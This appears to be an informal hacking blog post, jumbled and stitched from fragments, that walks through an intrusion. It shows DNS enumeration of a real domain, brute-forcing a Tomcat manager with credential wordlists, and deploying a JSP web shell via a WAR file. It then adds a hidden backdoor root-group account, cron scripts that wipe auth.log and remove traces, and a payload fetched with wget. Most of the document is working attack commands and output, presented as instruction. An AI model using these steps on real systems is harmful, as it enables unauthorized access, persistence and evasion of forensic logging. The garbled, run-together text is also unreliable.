yo... What's up ^_^
I'ev been playing with this ebook and so much idea I got so... if u wanna be a Good Hacker, u mush have this 1 cos it will give yo lot of good idea how to be a good Hacker
download here
password: bayangannyadika
$:/pentest/enumeration/dnsenum$ sudo ./dnsenum.pl
[sudo] password for zee-laptop:
dnsenum.pl VERSION:1.2
Usage: dnsenum.pl [Options] <domain>
[Options]:
Note: the brute force -f switch must be specified to be able to continue
the process execution.
GENERAL OPTIONS:
--dnsserver <server>
Use this DNS server for A, NS and MX queries.
--enum Shortcut option equivalent to --threads 5 -s 20 -w.
-h, --help Print this help message.
--noreverse Skip the reverse lookup operations.
--private Show and save private ips at the end of the file
domain_ips.txt.
--subfile <file> Write all valid subdomains to this file.
-t, --timeout <value> The tcp and udp timeout values in seconds
(default: 10s).
--threads <value> The number of threads that will perform different
queries.
-v, --verbose Be verbose: show all the progress and all the error
messages.
GOOGLE SCRAPING OPTIONS:
-p, --pages <value> The number of google search pages to process when
scraping names, the default is 20 pages,
the -s switch must be specified.
-s, --scrap <value> The maximum number of subdomains that will be scraped
from google.
BRUTE FORCE OPTIONS:
-f, --file <file> Read subdomains from this file to perform brute force.
-u, --update <a|g|r|z>
Update the file specified with the -f switch with
vaild subdomains.
a (all) Update using all results.
g Update using only google scraping results.
r Update using only reverse lookup results.
z Update using only zonetransfer results.
-r, --recursion Recursion on subdomains, brute force all discovred
subdomains that have an NS record.
WHOIS NETRANGE OPTIONS:
-d, --delay <value> The maximum value of seconds to wait between whois
queries, the value is defined randomly, default: 3s.
-w, --whois Perform the whois queries on c class network ranges.
**Warning**: this can generate very large netranges
and it will take lot of time to performe reverse
lookups.
REVERSE LOOKUP OPTIONS:
-e, --exclude <regexp>
Exclude PTR records that match the regexp expression
from reverse lookup results, useful on invalid
hostnames.
$:/pentest/enumeration/dnsenum$ ./dnsenum.pl kaskus.us
dnsenum.pl VERSION:1.2
----- kaskus.us -----
-----------------
Host's addresses:
-----------------
kaskus.us. 2595 IN A 112.78.131.5
kaskus.us. 2595 IN A 112.78.131.2
-------------
Name servers:
-------------
ns1.lumanau.web.id. 38400 IN A 76.73.7.6
ns2.lumanau.web.id. 38241 IN A 202.160.120.228
-----------
MX record:
-----------
---------------------
Trying Zonetransfers:
---------------------
trying zonetransfer for kaskus.us on ns1.lumanau.web.id ...
trying zonetransfer for kaskus.us on ns2.lumanau.web.id ...
brute force file not specified, bay.sudo apt-get install python-qt4 python-mysqldb python-psycopg2 python-pymssql python-qscintilla2svn checkout http://hexorbase.googlecode.com/svn/HexorBase/ hexorbasecd hexorbasepython execute.pyroot@eichel:~# cat usertomcat tes test admin money administrator dodol admin1 admin123 admin1234 root@eichel:~# cat passwordtomcat test tes monkey manager admin manager command tes1 admin123
(-M) modul = http (-h) host, ip atau nama (-U) usename.lst ( kamus ) (-P) password.lst ( kamus ) (-e ns) [n] =coba tanpa password, [s] kemungkinan password = username (-n) port (-m) direktori path ( manager/html adalah default admin page dari tomcat )
root@eichel:~# unzip kenadeh.war Archive: kenadeh.war inflating: META-INF/MANIFEST.MF inflating: WEB-INF/web.xml inflating: cazyptnwpvlazb.jsp inflating: CBMazgyh.txt
uname -a Linux ubuntu 2.6.35-02063504-generic #201008271919 SMP Fri Aug 27 20:27:22 UTC 2010 i686 GNU/Linux
root@ubuntu:/var/lib/tomcat6/shared# cat /etc/sudoers cat /etc/sudoers ... #includedir /etc/sudoers.d # Members of the admin group may gain root privileges %admin ALL=(ALL) ALL ... root@ubuntu:/var/lib/tomcat6/shared#
root@ubuntu:cd /etc/perl/CPAN root@ubuntu:/etc/perl/CPAN#
useradd admin -G admin -p saOhMg4WOk7iY -d /etc/perl/CPAN/.../.../ -s /bin/bash
root@eichel:~# perl -e 'print crypt("150787", "salt"),"\n"'
saOhMg4WOk7iY
#/bin/bash rm -rf /var/log/auth.log touch /var/log/auth.log userdel admin
01 23 1,7,14,21 1-12 * /etc/perl/CPAN/.../..././auth.sh 01 0 2,8,15,22 1-12 * /etc/perl/CPAN/.../..././antifor.sh
root@ubuntu:/etc/perl/CPAN/.../...# wget http://192.168.1.10/auth.zip wget http://192.168.1.10/auth.zip --2012-04-12 12:47:38-- http://192.168.1.10/auth.zip Connecting to 192.168.1.10:80... connected. HTTP request sent, awaiting response... 200 OK Length: 852 [application/zip] Saving to: `auth.zip' 100%[======================================>] 852 --.-K/s in 0s 2012-04-12 12:47:39 (51.8 MB/s) - `auth.zip' saved [852/852]
root@eichel:~# ssh admin@192.168.1.6 admin@192.168.1.6's password: Added user admin.
1.log tomcat root@ubuntu:/var/log/tomcat6# ls ls catalina.2012-04-11.log catalina.out localhost.2012-04-12.log catalina.2012-04-12.log localhost.2012-04-11.log root@ubuntu:/var/log/tomcat6# cat localhost.2012-04-12.log cat localhost.2012-04-12.log Apr 12, 2012 7:04:26 AM org.apache.catalina.core.ApplicationContext log --- INFO: HTMLManager: undeploy: Undeploying web application at '/kenadeh' ---